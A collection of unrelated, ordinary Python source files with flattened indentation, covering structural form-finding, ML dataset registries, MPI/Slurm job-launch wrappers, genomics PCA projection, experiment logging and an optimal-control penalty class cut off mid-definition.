ij_q = {(key_index[u], key_index[v]): ij_q[u, v] for u, v in ij_q}
nonzero_fixed, nonzero_free = nonzero(adjacency, fixed, free)
CtQC = xalglib.sparsecreate(n, n)
CitQCi = xalglib.sparsecreate(ni, ni)
CitQCf = xalglib.sparsecreate(ni, nf)
solver = xalglib.linlsqrcreate(ni, ni)
update_matrices(adjacency, free, nonzero_fixed, nonzero_free, CtQC, CitQCf, CitQCi, ij_q)
update_z(solver, xyz, xyzf, free, CtQC, CitQCf, CitQCi, selfweight=selfweight, kmax=kmax, tol=tol)
p = deepcopy(loads)
sw = selfweight(xyz)
for i in range(len(p)):
p[i][2] -= sw[i]
rx, ry, rz = compute_residuals(xyz, p, n, CtQC)
for key in form.vertices():
index = key_index[key]
form.vertex_attributes(key, 'xyz', xyz[index])
form.vertex_attributes(key, 'rx', rx[index])
form.vertex_attributes(key, 'ry', ry[index])
form.vertex_attributes(key, 'rz', rz[index])
for u, v in form.edges():
l = form.edge_length(u, v)
f = q * l
form.edge_attributes((u, v), ('f', 'l'), (f, l))
# ==============================================================================
# helpers
# ==============================================================================
def selfweight_calculator(form, density=1.0):
key_index = form.key_index()
sw = [0] * form.number_of_vertices()
rho = [attr['t'] * density for key, attr in form.vertices(True)]
def calculate_selfweight(xyz):
fkey_centroid = {fkey: form.face_centroid(fkey) for fkey in form.faces() if form.face_attribute(fkey, '_is_loaded')}
for u in form.vertices():
i = key_index[u]
p0 = xyz[i]
area = 0
for v in form.halfedge[u]:
j = key_index[v]
p01 = subtract_vectors(xyz[j], p0)
fkey = form.halfedge[u][v]
if fkey in fkey_centroid:
p02 = subtract_vectors(fkey_centroid[fkey], p0)
area += length_vector(cross_vectors(p01, p02))
fkey = form.halfedge[v][u]
if fkey in fkey_centroid:
p03 = subtract_vectors(fkey_centroid[fkey], p0)
area += length_vector(cross_vectors(p01, p03))
sw[i] = 0.25 * area * rho[i]
return sw
return calculate_selfweight
def nonzero(adjacency, fixed, free):
n = len(adjacency)
j_col_free = {value: index for index, value in enumerate(free)}
j_col_fixed = {value: index for index, value in enumerate(fixed)}
i_nonzero_free = {i: [] for i in range(n)}
i_nonzero_fixed = {i: [] for i in range(n)}
fixed = set(fixed)
for i in range(n):
if i in fixed:
i_nonzero_fixed[i].append((i, j_col_fixed[i]))
else:
i_nonzero_free[i].append((i, j_col_free[i]))
for j in adjacency[i]:
if j in fixed:
i_nonzero_fixed[i].append((j, j_col_fixed[j]))
else:
i_nonzero_free[i].append((j, j_col_free[j]))
return i_nonzero_fixed, i_nonzero_free
def update_matrices(adjacency, free, nonzero_fixed, nonzero_free, CtQC, CitQCf, CitQCi, ij_q):
xalglib.sparseconverttohash(CtQC)
xalglib.sparseconverttohash(CitQCi)
xalglib.sparseconverttohash(CitQCf)
n = len(adjacency)
ni = len(free)
for i in range(n):
Q = 0
for j in adjacency[i]:
q = ij_q[(i, j)]
Q += q
xalglib.sparseset(CtQC, i, j, -q)
xalglib.sparseset(CtQC, i, i, Q)
for row in range(ni):
i = free[row]
for j, col in nonzero_fixed[i]:
xalglib.sparseset(CitQCf, row, col, xalglib.sparseget(CtQC, i, j))
for j, col in nonzero_free[i]:
xalglib.sparseset(CitQCi, row, col, xalglib.sparseget(CtQC, i, j))
def update_z(solver, xyz, xyzf, free, CtQC, CitQCf, CitQCi, selfweight, tol=1e-3, kmax=100):
# solve A.x = b
# with A = CitQCi
# b = pzi - CitQCf.zf
# x = zi
xalglib.sparseconverttocrs(CitQCi)
xalglib.sparseconverttocrs(CitQCf)
xalglib.sparseconverttocrs(CtQC)
n = len(xyz)
ni = len(free)
z = [z for _, _, z in xyz]
zf = [z for _, _, z in xyzf]
A = CitQCi
b_ = xalglib.sparsemv(CitQCf, zf, [0] * ni)
out = [0] * n
for k in range(kmax):
sw = selfweight(xyz)
b = [- sw[i][2] - b_[i] for i in range(ni)]
xalglib.linlsqrsolvesparse(solver, A, b)
zi, _ = xalglib.linlsqrresults(solver)
for i in range(ni):
z[free[i]] = zi[i]
rz = xalglib.sparsemv(CtQC, z, out)
rz = [- sw[i][2] - rz[i] for i in range(n)]
residual = norm([rz[free[i]] for i in range(ni)])
if residual < tol:
break
for i in range(ni):
xyz[free[i]][2] = zi[i]
return residual
def compute_residuals(xyz, p, n, CtQC):
# residual = CtQC.xyz - p
xalglib.sparseconverttocrs(CtQC)
x, y, z = zip(*xyz)
x = list(x)
y = list(y)
z = list(z)
out = [0] * n
rx = xalglib.sparsemv(CtQC, x, out)
rx = [p[i][0] - rx[i] for i in range(n)]
ry = xalglib.sparsemv(CtQC, y, out)
ry = [p[i][1] - ry[i] for i in range(n)]
rz = xalglib.sparsemv(CtQC, z, out)
rz = [p[i][2] - rz[i] for i in range(n)]
return rx, ry, rz
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
|
from .builder import build_dataset
from .cityscapes import CityscapesDataset
from .coco import CocoDataset
from .custom import CustomDataset
from .dataset_wrappers import ConcatDataset, RepeatDataset
from .loader import DistributedGroupSampler, GroupSampler, build_dataloader
from .registry import DATASETS
from .voc import VOCDataset
from .wider_face import WIDERFaceDataset
from .xml_style import XMLDataset
from .future_dataset import FutureDataset
__all__ = [
'CustomDataset', 'XMLDataset', 'CocoDataset', 'VOCDataset',
'CityscapesDataset', 'GroupSampler', 'DistributedGroupSampler',
'build_dataloader', 'ConcatDataset', 'RepeatDataset', 'WIDERFaceDataset',
'DATASETS', 'build_dataset', 'FutureDataset'
]
|
from anuvaad_auditor.loghandler import log_info, log_exception
from utilities import MODULE_CONTEXT
def logs_book(entity,value,message):
'''
Captures specific entity to keep track of logs at various level
'''
try:
log_info("{} || {} || {}".format(entity,value,message),MODULE_CONTEXT)
except Exception as e:
log_exception("Exception caught in logs_book {}".format(e),MODULE_CONTEXT,e)
|
#!/usr/bin/python
"""
(C) Copyright 2020 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
from distutils.spawn import find_executable
import os
from command_utils import ExecutableCommand
from command_utils_base import FormattedParameter, EnvironmentVariables
from env_modules import load_mpi
from write_host_file import write_host_file
class JobManager(ExecutableCommand):
"""A class for commands with parameters that manage other commands."""
def __init__(self, namespace, command, job, path="", subprocess=False):
"""Create a JobManager object.
Args:
namespace (str): yaml namespace (path to parameters)
command (str): string of the command to be executed.
job (ExecutableCommand): command object to manage.
path (str, optional): path to location of command binary file.
Defaults to "".
subprocess (bool, optional): whether the command is run as a
subprocess. Defaults to False.
"""
super(JobManager, self).__init__(namespace, command, path, subprocess)
self.job = job
def __str__(self):
"""Return the command with all of its defined parameters as a string.
Returns:
str: the command with all the defined parameters
"""
commands = [super(JobManager, self).__str__(), str(self.job)]
return " ".join(commands)
def check_subprocess_status(self, sub_process):
"""Verify command status when called in a subprocess.
Args:
sub_process (process.SubProcess): subprocess used to run the command
Returns:
bool: whether or not the command progress has been detected
"""
return self.job.check_subprocess_status(sub_process)
# deprecated: Use assign_[hosts|processes|environment]() methods instead
def setup_command(self, env, hostfile, processes):
"""Set up the job manager command with common inputs.
Args:
env (EnvironmentVariables): the environment variables to use with
the launch command
hostfile (str): file defining host names and slots
processes (int): number of host processes
"""
pass
def assign_hosts(self, hosts, path=None, slots=None):
"""Assign the hosts to use with the command.
Set the appropriate command line parameter with the specified value.
Args:
hosts (list): list of hosts to specify on the command line
path (str, optional): path to use when specifying the hosts through
a hostfile. Defaults to None.
slots (int, optional): number of slots per host to specify in the
optional hostfile. Defaults to None.
"""
pass
def assign_processes(self, processes):
"""Assign the number of processes per node.
Set the appropriate command line parameter with the specified value.
Args:
processes (int): number of processes per node
"""
pass
def assign_environment(self, env_vars, append=False):
"""Assign or add environment variables to the command.
Args:
env_vars (EnvironmentVariables): the environment variables to use
assign or add to the command
append (bool): whether to assign (False) or append (True) the
specified environment variables
"""
pass
def assign_environment_default(self, env_vars):
"""Assign the default environment variables for the command.
Args:
env_vars (EnvironmentVariables): the environment variables to
assign as the default
"""
pass
class Orterun(JobManager):
"""A class for the orterun job manager command."""
def __init__(self, job, subprocess=False):
"""Create a Orterun object.
Args:
job (ExecutableCommand): command object to manage.
subprocess (bool, optional): whether the command is run as a
subprocess. Defaults to False.
"""
load_mpi("openmpi")
path = os.path.dirname(find_executable("orterun"))
super(Orterun, self).__init__(
"/run/orterun", "orterun", job, path, subprocess)
# Default mca values to avoid queue pair errors
mca_default = {
"btl_openib_warn_default_gid_prefix": "0",
"btl": "tcp,self",
"oob": "tcp",
"pml": "ob1",
}
self.hostfile = FormattedParameter("--hostfile {}", None)
self.processes = FormattedParameter("--np {}", 1)
self.display_map = FormattedParameter("--display-map", False)
self.map_by = FormattedParameter("--map-by {}", "node")
self.export = FormattedParameter("-x {}", None)
self.enable_recovery = FormattedParameter("--enable-recovery", True)
self.report_uri = FormattedParameter("--report-uri {}", None)
self.allow_run_as_root = FormattedParameter("--allow-run-as-root", None)
self.mca = FormattedParameter("--mca {}", mca_default)
self.pprnode = FormattedParameter("--map-by ppr:{}:node", None)
self.tag_output = FormattedParameter("--tag-output", True)
self.ompi_server = FormattedParameter("--ompi-server {}", None)
# deprecated: Use assign_[hosts|processes|environment]() methods instead
def setup_command(self, env, hostfile, processes):
"""Set up the orterun command with common inputs.
Args:
env (EnvironmentVariables): the environment variables to use with
the launch command
hostfile (str): file defining host names and slots
processes (int): number of host processes
"""
# Setup the env for the job to export with the orterun command
if self.export.value is None:
self.export.value = []
self.export.value.extend(env.get_list())
# Setup the orterun command
self.hostfile.value = hostfile
self.processes.value = processes
def assign_hosts(self, hosts, path=None, slots=None):
"""Assign the hosts to use with the command (--hostfile).
Args:
hosts (list): list of hosts to specify in the hostfile
path (str, optional): hostfile path. Defaults to None.
slots (int, optional): number of slots per host to specify in the
hostfile. Defaults to None.
"""
kwargs = {"hostlist": hosts, "slots": slots}
if path is not None:
kwargs["path"] = path
self.hostfile.value = write_host_file(**kwargs)
def assign_processes(self, processes):
"""Assign the number of processes per node (-np).
Args:
processes (int): number of processes per node
"""
self.processes.value = processes
def assign_environment(self, env_vars, append=False):
"""Assign or add environment variables to the command.
Args:
env_vars (EnvironmentVariables): the environment variables to use
assign or add to the command
append (bool): whether to assign (False) or append (True) the
specified environment variables
"""
if append and self.export.value is not None:
# Convert the current list of environmental variable assignments
# into an EnvironmentVariables (dict) object. Then update the
# dictionary keys with the specified values or add new key value
# pairs to the dictionary. Finally convert the updated dictionary
# back to a list for the parameter assignment.
original = EnvironmentVariables({
item.split("=")[0]: item.split("=")[1] if "=" in item else None
for item in self.export.value})
original.update(env_vars)
self.export.value = original.get_list()
else:
# Overwrite the environmental variable assignment
self.export.value = env_vars.get_list()
def assign_environment_default(self, env_vars):
"""Assign the default environment variables for the command.
Args:
env_vars (EnvironmentVariables): the environment variables to
assign as the default
"""
self.export.update_default(env_vars.get_list())
def run(self):
"""Run the orterun command.
Raises:
CommandFailure: if there is an error running the command
"""
load_mpi("openmpi")
return super(Orterun, self).run()
class Mpirun(JobManager):
"""A class for the mpirun job manager command."""
def __init__(self, job, subprocess=False, mpitype="openmpi"):
"""Create a Mpirun object.
Args:
job (ExecutableCommand): command object to manage.
subprocess (bool, optional): whether the command is run as a
subprocess. Defaults to False.
"""
load_mpi(mpitype)
path = os.path.dirname(find_executable("mpirun"))
super(Mpirun, self).__init__(
"/run/mpirun", "mpirun", job, path, subprocess)
self.hostfile = FormattedParameter("-hostfile {}", None)
self.processes = FormattedParameter("-np {}", 1)
self.ppn = FormattedParameter("-ppn {}", None)
self.envlist = FormattedParameter("-envlist {}", None)
self.mpitype = mpitype
# deprecated: Use assign_[hosts|processes|environment]() methods instead
def setup_command(self, env, hostfile, processes):
"""Set up the mpirun command with common inputs.
Args:
env (EnvironmentVariables): the environment variables to use with
the launch command
hostfile (str): file defining host names and slots
processes (int): number of host processes
"""
# Setup the env for the job to export with the mpirun command
self._pre_command = env.get_export_str()
# Setup the orterun command
self.hostfile.value = hostfile
self.processes.value = processes
def assign_hosts(self, hosts, path=None, slots=None):
"""Assign the hosts to use with the command (-f).
Args:
hosts (list): list of hosts to specify in the hostfile
path (str, optional): hostfile path. Defaults to None.
slots (int, optional): number of slots per host to specify in the
hostfile. Defaults to None.
"""
kwargs = {"hostlist": hosts, "slots": slots}
if path is not None:
kwargs["path"] = path
self.hostfile.value = write_host_file(**kwargs)
def assign_processes(self, processes):
"""Assign the number of processes per node (-np).
Args:
processes (int): number of processes per node
"""
self.processes.value = processes
def assign_environment(self, env_vars, append=False):
"""Assign or add environment variables to the command.
Args:
env_vars (EnvironmentVariables): the environment variables to use
assign or add to the command
append (bool): whether to assign (False) or append (True) the
specified environment variables
"""
if append and self.envlist.value is not None:
# Convert the current list of environmental variable assignments
# into an EnvironmentVariables (dict) object. Then update the
# dictionary keys with the specified values or add new key value
# pairs to the dictionary. Finally convert the updated dictionary
# back to a string for the parameter assignment.
original = EnvironmentVariables({
item.split("=")[0]: item.split("=")[1] if "=" in item else None
for item in self.envlist.value.split(",")})
original.update(env_vars)
self.envlist.value = ",".join(original.get_list())
else:
# Overwrite the environmental variable assignment
self.envlist.value = ",".join(env_vars.get_list())
def assign_environment_default(self, env_vars):
"""Assign the default environment variables for the command.
Args:
env_vars (EnvironmentVariables): the environment variables to
assign as the default
"""
self.envlist.update_default(env_vars.get_list())
def run(self):
"""Run the mpirun command.
Raises:
CommandFailure: if there is an error running the command
"""
load_mpi(self.mpitype)
return super(Mpirun, self).run()
class Srun(JobManager):
"""A class for the srun job manager command."""
def __init__(self, job, path="", subprocess=False):
"""Create a Srun object.
Args:
job (ExecutableCommand): command object to manage.
path (str, optional): path to location of command binary file.
Defaults to "".
subprocess (bool, optional): whether the command is run as a
subprocess. Defaults to False.
"""
super(Srun, self).__init__("/run/srun", "srun", job, path, subprocess)
self.label = FormattedParameter("--label", False)
self.mpi = FormattedParameter("--mpi={}", None)
self.export = FormattedParameter("--export={}", None)
self.ntasks = FormattedParameter("--ntasks={}", None)
self.distribution = FormattedParameter("--distribution={}", None)
self.nodefile = FormattedParameter("--nodefile={}", None)
self.nodelist = FormattedParameter("--nodelist={}", None)
self.ntasks_per_node = FormattedParameter("--ntasks-per-node={}", None)
self.reservation = FormattedParameter("--reservation={}", None)
self.partition = FormattedParameter("--partition={}", None)
self.output = FormattedParameter("--output={}", None)
# deprecated: Use assign_[hosts|processes|environment]() methods instead
def setup_command(self, env, hostfile, processes):
"""Set up the srun command with common inputs.
Args:
env (EnvironmentVariables): the environment variables to use with
the launch command
hostfile (str): file defining host names and slots
processes (int): number of host processes
processpernode (int): number of process per node
"""
# Setup the env for the job to export with the srun command
self.export.value = ",".join(["ALL"] + env.get_list())
# Setup the srun command
self.label.value = True
self.mpi.value = "pmi2"
if processes is not None:
self.ntasks.value = processes
self.distribution.value = "cyclic"
if hostfile is not None:
self.nodefile.value = hostfile
def assign_hosts(self, hosts, path=None, slots=None):
"""Assign the hosts to use with the command (-f).
Args:
hosts (list): list of hosts to specify in the hostfile
path (str, optional): hostfile path. Defaults to None.
slots (int, optional): number of slots per host to specify in the
hostfile. Defaults to None.
"""
kwargs = {"hostlist": hosts, "slots": None}
if path is not None:
kwargs["path"] = path
self.nodefile.value = write_host_file(**kwargs)
self.ntasks_per_node.value = slots
def assign_processes(self, processes):
"""Assign the number of processes per node (--ntasks).
Args:
processes (int): number of processes per node
"""
self.ntasks.value = processes
self.distribution.value = "cyclic"
def assign_environment(self, env_vars, append=False):
"""Assign or add environment variables to the command.
Args:
env_vars (EnvironmentVariables): the environment variables to use
assign or add to the command
append (bool): whether to assign (False) or append (True) the
specified environment variables
"""
if append and self.export.value is not None:
# Convert the current list of environmental variable assignments
# into an EnvironmentVariables (dict) object. Then update the
# dictionary keys with the specified values or add new key value
# pairs to the dictionary. Finally convert the updated dictionary
# back to a string for the parameter assignment.
original = EnvironmentVariables({
item.split("=")[0]: item.split("=")[1] if "=" in item else None
for item in self.export.value.split(",")})
original.update(env_vars)
self.export.value = ",".join(original.get_list())
else:
# Overwrite the environmental variable assignment
self.export.value = ",".join(env_vars.get_list())
def assign_environment_default(self, env_vars):
"""Assign the default environment variables for the command.
Args:
env_vars (EnvironmentVariables): the environment variables to
assign as the default
"""
self.export.update_default(env_vars.get_list())
|
#!python
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import util
def test_delete():
util.copy_file('a.txt', 'a.txt.bak')
util.copy_dir('d1', 'd1_bak')
util.delete('a.txt')
util.delete('d1', force=True)
return 'delete OK'
def main():
s = test_delete()
util.send_response('text', s)
main()
|
# coding: utf-8
import pprint
import re
import six
class VersionMediatypes:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'type': 'str',
'base': 'str'
}
attribute_map = {
'type': 'type',
'base': 'base'
}
def __init__(self, type=None, base=None):
"""VersionMediatypes - a model defined in huaweicloud sdk"""
self._type = None
self._base = None
self.discriminator = None
self.type = type
self.base = base
@property
def type(self):
"""Gets the type of this VersionMediatypes.
媒体类型。
:return: The type of this VersionMediatypes.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this VersionMediatypes.
媒体类型。
:param type: The type of this VersionMediatypes.
:type: str
"""
self._type = type
@property
def base(self):
"""Gets the base of this VersionMediatypes.
基础类型。
:return: The base of this VersionMediatypes.
:rtype: str
"""
return self._base
@base.setter
def base(self, base):
"""Sets the base of this VersionMediatypes.
基础类型。
:param base: The base of this VersionMediatypes.
:type: str
"""
self._base = base
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VersionMediatypes):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
#!/usr/bin/env python3
"""
Chain models.
Masking.
Show output of layer.
"""
import numpy as np
from tensorflow.keras import Input
from tensorflow.keras.layers import Masking, Dense
from tensorflow.keras.regularizers import l2
from tensorflow.keras.models import Sequential, Model
X_train = np.random.rand(4,3,2)
Dense_unit = 1
dense_reg = 0.01
mdl = Sequential()
mdl.add(Input(shape=(X_train.shape[1],X_train.shape[2]),name='input_feature'))
mdl.add(Masking(mask_value=0,name='masking'))
mdl.add(Dense(Dense_unit,kernel_regularizer=l2(dense_reg),activation='relu',name='output_feature'))
mdl.summary()
#this is the same as chaining models
mdl2mask = Model(inputs=mdl.input,outputs=mdl.get_layer("masking").output)
mdl2mask.compile()
mdl.compile()
maskoutput = mdl2mask.predict(X_train)
mdloutput = mdl.predict(X_train)
print(maskoutput) # print output after/of masking
print(mdloutput) # print output of mdl
print(maskoutput.shape) #(4, 3, 2): masking has the shape of the layer before (input here)
print(mdloutput.shape) #(4, 3, 1): shape of the output of dense
|
"""
Calculate coverage statistics, cf. https://github.com/lexibank/abvdoceanic/issues/3
"""
from pathlib import Path
from cltoolkit import Wordlist
from pycldf import Dataset
from pyclts import CLTS
from tabulate import tabulate
from cldfbench.cli_util import with_dataset, get_dataset
def run(args):
path = (Path(__file__).parents[1]).joinpath("cldf/cldf-metadata.json")
# Load data
bipa = CLTS().bipa
wl = Wordlist([ Dataset.from_metadata(path) ], ts=bipa)
# Create coverage table
args.log.info("Creating coverage table...")
table = []
for language in wl.languages:
table += [[language.name, len(language.concepts), len(language.forms_with_sounds),
len(language.sound_inventory.consonants), len(language.sound_inventory.vowels)]]
return tabulate(table, headers=["Name", "Concepts", "Forms", "Consonants", "Vowels"], tablefmt="pipe")
|
import hail as hl
from hail.typecheck import typecheck
from hail.expr.expressions import expr_call, expr_numeric, expr_array, \
check_entry_indexed, check_row_indexed
@typecheck(call_expr=expr_call,
loadings_expr=expr_array(expr_numeric),
af_expr=expr_numeric)
def pc_project(call_expr, loadings_expr, af_expr):
"""Projects genotypes onto pre-computed PCs. Requires loadings and
allele-frequency from a reference dataset (see example). Note that
`loadings_expr` must have no missing data and reflect the rows
from the original PCA run for this method to be accurate.
Example
-------
>>> # Compute loadings and allele frequency for reference dataset
>>> _, _, loadings_ht = hl.hwe_normalized_pca(mt.GT, k=10, compute_loadings=True) # doctest: +SKIP
>>> mt = mt.annotate_rows(af=hl.agg.mean(mt.GT.n_alt_alleles()) / 2) # doctest: +SKIP
>>> loadings_ht = loadings_ht.annotate(af=mt.rows()[loadings_ht.key].af) # doctest: +SKIP
>>> # Project new genotypes onto loadings
>>> ht = pc_project(mt_to_project.GT, loadings_ht.loadings, loadings_ht.af) # doctest: +SKIP
Parameters
----------
call_expr : :class:`.CallExpression`
Entry-indexed call expression for genotypes
to project onto loadings.
loadings_expr : :class:`.ArrayNumericExpression`
Location of expression for loadings
af_expr : :class:`.Float64Expression`
Location of expression for allele frequency
Returns
-------
:class:`.Table`
Table with scores calculated from loadings in column `scores`
"""
check_entry_indexed('pc_project', call_expr)
check_row_indexed('pc_project', loadings_expr)
check_row_indexed('pc_project', af_expr)
gt_source = call_expr._indices.source
loadings_source = loadings_expr._indices.source
af_source = af_expr._indices.source
loadings_expr = _get_expr_or_join(loadings_expr, loadings_source, gt_source, '_loadings')
af_expr = _get_expr_or_join(af_expr, af_source, gt_source, '_af')
mt = gt_source._annotate_all(row_exprs={'_loadings': loadings_expr, '_af': af_expr},
entry_exprs={'_call': call_expr})
if isinstance(loadings_source, hl.MatrixTable):
n_variants = loadings_source.count_rows()
else:
n_variants = loadings_source.count()
mt = mt.filter_rows(hl.is_defined(mt._loadings) & hl.is_defined(mt._af) & (mt._af > 0) & (mt._af < 1))
gt_norm = (mt._call.n_alt_alleles() - 2 * mt._af) / hl.sqrt(n_variants * 2 * mt._af * (1 - mt._af))
return mt.select_cols(scores=hl.agg.array_sum(mt._loadings * gt_norm)).cols()
def _get_expr_or_join(expr, source, other_source, loc):
if source != other_source:
if isinstance(source, hl.MatrixTable):
source = source.annotate_rows(**{loc: expr})
else:
source = source.annotate(**{loc: expr})
expr = source[other_source.row_key][loc]
return expr
|
"""
This demo shows how to use the `experiment` package to log both to `Visdom` and `mlflow`.
"""
from experiment import MLflowExperiment
from experiment import VisdomExperiment
from experiment.visdom import create_parameters_windows, Line, Window
import logging
import mlflow
from traitlets import Enum, Float, Int, Unicode
import time
try:
from tqdm import trange
except ImportError:
trange = range
class Main(MLflowExperiment, VisdomExperiment):
#
# Description of the experiment. Used in the help message.
#
description = Unicode("Demonstration of using Visdom and MLflow logging.")
#
# Parameters of experiment
#
epochs = Int(100, config=True, help="Number of epochs")
lr = Float(0.5, config=True, help="Learning rate of training").tag(parameter=True)
loss_type = Enum(("mse", "l1"), config=True, default_value="mse", help="Loss type.")
def run(self):
"""Running the experiment"""
logging.info("Starting experiment")
logging.info("Using {} loss".format(self.loss_type))
#
# Create the Visdom window and loss plot. The same window can be used for multiple plots.
#
win = Window(env=self.visdom_env, xlabel="epoch", ylabel="Loss", title="Loss")
loss_plot = Line("util", win)
loss = 100
for i in trange(self.epochs):
loss_plot.append(x=i, y=loss)
mlflow.log_metric("loss", loss)
loss = loss * self.lr
#
# Update the properties view window.
#
self.visdom_params_win.update(x=i)
time.sleep(.5)
logging.info("Experiment finished")
if __name__ == "__main__":
main = Main()
main.initialize()
main.start()
|
from typing import Any, Union, Callable
import biorbd_casadi as biorbd
from casadi import horzcat, vertcat, Function, MX, SX
import numpy as np
from .penalty_node import PenaltyNodeList
from ..misc.enums import Node, PlotType, ControlType, ConstraintType, IntegralApproximation
from ..misc.mapping import Mapping, BiMapping
from ..misc.options import OptionGeneric
class PenaltyOption(OptionGeneric):
"""
A placeholder for a penalty
Attributes
----------
node: Node
The node within a phase on which the penalty is acting on
quadratic: bool
If the penalty is quadratic
rows: Union[list, tuple, range, np.ndarray]
The index of the rows in the penalty to keep
cols: Union[list, tuple, range, np.ndarray]
The index of the columns in the penalty to keep
expand: bool
If the penalty should be expanded or not
target: np.array(target)
A target to track for the penalty
target_plot_name: str
The plot name of the target
target_to_plot: np.ndarray
The subset of the target to plot
plot_target: bool
If the target should be plotted
custom_function: Callable
A user defined function to call to get the penalty
node_idx: Union[list, tuple, Node]
The index in nlp to apply the penalty to
dt: float
The delta time
function: Function
The casadi function of the penalty
weighted_function: Function
The casadi function of the penalty weighted
derivative: bool
If the minimization is applied on the numerical derivative of the state [f(t+1) - f(t)]
explicit_derivative: bool
If the minimization is applied to derivative of the penalty [f(t, t+1)]
integration_rule: IntegralApproximation
The integration rule to use for the penalty
transition: bool
If the penalty is a transition
phase_pre_idx: int
The index of the nlp of pre when penalty is transition
phase_post_idx: int
The index of the nlp of post when penalty is transition
constraint_type: ConstraintType
If the penalty is from the user or from bioptim (implicit or internal)
multi_thread: bool
If the penalty is multithreaded
Methods
-------
set_penalty(self, penalty: Union[MX, SX], all_pn: PenaltyNodeList)
Prepare the dimension and index of the penalty (including the target)
_set_dim_idx(self, dim: Union[list, tuple, range, np.ndarray], n_rows: int)
Checks if the variable index is consistent with the requested variable.
_check_target_dimensions(self, all_pn: PenaltyNodeList, n_time_expected: int)
Checks if the variable index is consistent with the requested variable.
If the function returns, all is okay
_set_penalty_function(self, all_pn: Union[PenaltyNodeList, list, tuple], fcn: Union[MX, SX])
Finalize the preparation of the penalty (setting function and weighted_function)
add_target_to_plot(self, all_pn: PenaltyNodeList, combine_to: str)
Interface to the plot so it can be properly added to the proper plot
_finish_add_target_to_plot(self, all_pn: PenaltyNodeList)
Internal interface to add (after having check the target dimensions) the target to the plot if needed
add_or_replace_to_penalty_pool(self, ocp, nlp)
Doing some configuration on the penalty and add it to the list of penalty
_add_penalty_to_pool(self, all_pn: PenaltyNodeList)
Return the penalty pool for the specified penalty (abstract)
clear_penalty(self, ocp, nlp)
Resets a penalty. A negative penalty index creates a new empty penalty (abstract)
_get_penalty_node_list(self, ocp, nlp) -> PenaltyNodeList
Get the actual node (time, X and U) specified in the penalty
"""
def __init__(
self,
penalty: Any,
phase: int = 0,
node: Union[Node, list, tuple] = Node.DEFAULT,
target: Union[int, float, np.array, list[int], list[float], list[np.array]] = None,
quadratic: bool = None,
weight: float = 1,
derivative: bool = False,
explicit_derivative: bool = False,
integrate: bool = False,
integration_rule: IntegralApproximation = IntegralApproximation.DEFAULT,
index: list = None,
rows: Union[list, tuple, range, np.ndarray] = None,
cols: Union[list, tuple, range, np.ndarray] = None,
states_mapping: BiMapping = None,
custom_function: Callable = None,
constraint_type: ConstraintType = ConstraintType.USER,
multi_thread: bool = None,
expand: bool = False,
**params: Any,
):
"""
Parameters
----------
penalty: PenaltyType
The actual penalty
phase: int
The phase the penalty is acting on
node: Union[Node, list, tuple]
The node within a phase on which the penalty is acting on
target: Union[int, float, np.array, list[int], list[float], list[np.array]]
A target to track for the penalty
quadratic: bool
If the penalty is quadratic
weight: float
The weighting applied to this specific penalty
derivative: bool
If the function should be evaluated at X and X+1
explicit_derivative: bool
If the function should be evaluated at [X, X+1]
integrate: bool
If the function should be integrated
integration_rule: IntegralApproximation
The rule to use for the integration
index: int
The component index the penalty is acting on
custom_function: Callable
A user defined function to call to get the penalty
constraint_type: ConstraintType
If the penalty is from the user or from bioptim (implicit or internal)
**params: dict
Generic parameters for the penalty
"""
super(PenaltyOption, self).__init__(phase=phase, type=penalty, **params)
self.node: Union[Node, list, tuple] = node
self.quadratic = quadratic
self.integration_rule = integration_rule
if index is not None and rows is not None:
raise ValueError("rows and index cannot be defined simultaneously since they are the same variable")
self.rows = rows if rows is not None else index
self.cols = cols
self.expand = expand
self.target = None
if target is not None:
target = np.array(target)
if isinstance(target, int) or isinstance(target, float) or isinstance(target, np.ndarray):
target = [target]
self.target = []
for t in target:
self.target.append(np.array(t))
if len(self.target[-1].shape) == 0:
self.target[-1] = self.target[-1][np.newaxis]
if len(self.target[-1].shape) == 1:
self.target[-1] = self.target[-1][:, np.newaxis]
if len(self.target) == 1 and (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
):
if self.node == Node.ALL or self.node == Node.DEFAULT:
self.target = [self.target[0][:, :-1], self.target[0][:, 1:]]
else:
raise NotImplementedError(
f"A list of 2 elements is required with {self.node} and TRAPEZOIDAL Integration"
f"except for Node.NODE_ALL and Node.NODE_DEFAULT"
"which can be automatically generated"
)
self.target_plot_name = None
self.target_to_plot = None
# todo: not implemented yet for trapezoidal integration
self.plot_target = (
False
if (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
)
else True
)
self.states_mapping = states_mapping
self.custom_function = custom_function
